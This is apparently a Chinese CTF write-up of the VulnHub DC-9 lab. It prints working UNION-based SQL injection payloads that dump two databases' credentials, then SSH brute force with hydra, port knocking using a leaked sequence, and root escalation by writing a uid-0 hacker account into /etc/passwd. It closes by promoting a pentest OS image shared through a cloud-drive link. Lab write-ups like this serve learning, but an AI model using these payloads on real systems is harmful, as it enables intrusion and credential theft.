前言
-
这里说一下这个靶机的难点
-
1.这次sql注入是两个库的,在不使用sqlmap的情况下很多人直接database()看数据库,另一个库反倒没关注
-
2.nmap的扫描方式如果用-sT的tcp连接扫端口的话是扫不到那些被防火墙过滤的端口的,直接nmap ip就可以
-
3.在没有办法头绪的时候,不妨根据猜测去fuzz一些参数,看看能不能找到一个新思路
-
4.对于容易信息泄露的地方要排除
-
5.在实战的时候要根据对应的服务去找对应的思路,比如说ssh的请求被过滤了,是被什么防火墙过滤的?这个服务有些什么防范方式,这些都要去一个个排查。
-
tips:这个靶机算是比较接近实战的一个靶机了,冲吧家人们
-
附上下载链接:https://download.vulnhub.com/dc/DC-9.zip
信息收集
-
这里ssh被防火墙拦截了(并非没有开,知识被拦截了)
-
80端口开着
页面分析
首页
-
发现manage有个登录框,于是想到sql注入找用户名和密码进去,我们后面的思路就围绕这个展开
记录页
-
发现里面有用户信息
搜索页sql注入
-
查询入口尝试sql注入发现有回显
查看当前表的列数
-
用order by 看回显判断列数是6列
爆库
联合注入爆库
-1'union select 1,2,3,4,5,group_concat(schema_name) from information_schema.schemata #
-1'union select 1,2,3,4,5,database() #
可以看到有Staff员工库和users库,我们当前使用的库是staff 注意这里有两个库!!!!!!对staff库的分析
为了避免混乱我们先分析staff库
爆表
satff库的表
-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema='Staff'#
这里有两个表,一个是details,一个是users爆字段
StaffDetails表的字段
Users表的字段
查询代码
-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='Users'#
-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='StaffDetails'#-
注意:这里staff库的第一个表明显是之前我们可以直接查询到的明显不是重点,所以我们看第二个表的内容就好了
爆内容
Mary' union select 1,2,3,4,5,group_concat(Username,',',Password) from Staff.Users #(这里我用逗号隔开会好看一点)
爆了一串值,32位的,应该是md5值,我们去查一下MD5解密
-
密码是transorbital1
管理员登录页分析
登录进来了
-
除了能够新添加一个用户以外就只有一个file不存在的提示了,只有读取了一个不存在的文件才会有这个提示,所以想到使用file参数然后fuzz爆破试试看
如下
-
可以看到这是个文件读取漏洞
ssh配置文件查看
这里算比较重要的地方了,可以看到我们扫到了一个ssh的配置文件,加上刚才被nmap被过滤,我觉得应该从这里入手,直接看里面的文件信息。
不允许root访问,以及把22端口都注释掉了!!!那咋连接呢,在这个文件里面也没有找到更改了的其他默认端口
ssh入口分析
看似面临绝境,再去找一下ssh的防御手段,最后让我找到了下面这一篇文章!
别让黑客轻易入侵:端口敲门,让你的SSH固若金汤!-CSDN博客
我们去访问一下它的配置文件有没有,就知道是不是这个服务了
一看确实有,还暴露了它的knock序列,7469,8475,9842,然后我们的kali安装一下他这个b服务
使用knocked敲门
-
注意这里我敲了两次,因为我发现第一次敲完以后他没有开,回去看它的配置文件的时候发现要敲第二遍
准备ssh登录
用admin账号登录发现不行。之前也没有别的登录密码的办法啊就很奇怪。大家先别急,还记得我们的另一个库吗,还没看过呢,这就是我们要分两个库分析的原因啦
对users库的分析
爆表
users库的表
-1' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema='users'#
可以看到只有一个UserDetails表,应该就是我们需要的密码了爆字段
-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_name='UserDetails' #
果然有密码!!
字段我们选username和password就好了爆内容
-1' union select 1,2,3,4,5,group_concat(Username,',',Password) from users.UserDetails #
hydra爆破
账号密码都出来了,整理一下是下面这样
这里-C表示使用账号密码一一对应的字典爆破,得到了三个账号和密码
信息泄露
-
一般提权无所获,在janitor家目录下面找到一组泄露的密码
-
把旧密码删了然后hydra爆破
-
爆出了一个新用户密码
-
B4-Tru3-001
提权
-
给了我们test.py的用法,但是这个不是test.py啊,我们再去找找
-
发现了一个root用户的py脚本
意思是满足三个参数的条件,然后会把第二个参数的内容写到第三个参数里面去,这很简单啊,只要我们把用户的uid和gid改成0再写到passwd里面不就好了
这里去了解了一下,直接照猫画虎在passwd里面加类似的文件是行不通的,因为passwd还会到shadow里面去验证密码。有个说法说只要在passwd里面写入md5加盐的密码也可以,这里我试一下
openssl生成一个账户密码
username:password:UID:GID:connection:home dictionary:shell 按照这个格式输入到passwd里面 hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0::/root:/bin/bash
先写文件到有权限的目录下
然后我们回到最开始那个test来执行(他应该是一个类似软连接的指向作用吧,反正我们也只能执行这个了。)
执行一下提权成功
最后
感谢大家能够看完我的文章,小弟在这里也不虚头八脑的的去推销什么,就单纯给个工具(真心话,不是什么广告,能看到这里的也能看出来我的文章算是比较简练有效的。。)
就是分享给你们一个网络安全领域里面巨好用的windows系统(不好用直接评论区骂我无所谓的,真)
它比较适合新手小白,里面集成了大量的渗透工具,从漏洞扫描,抓包,反弹webshell,逆向等工具都有,好不好用试一试就知道了,下面是它的图片(左边有东西就不好透露啦,工具真的有很多,而且自带python,java等环境,不会有人现在还在自己花大量的时间配置把,里面还内嵌了kali,是的你没听错,一个系统在手,安全领域我有~
精简界面
海量工具
浏览器自带各种插件
下面是链接
我用夸克网盘分享了「你想要的都在这」,点击链接即可保存。打开「夸克APP」,无需下载在线播放视频,畅享原画5倍速,支持电视投屏。 链接:夸克网盘分享 提取码:kjxd
)
)
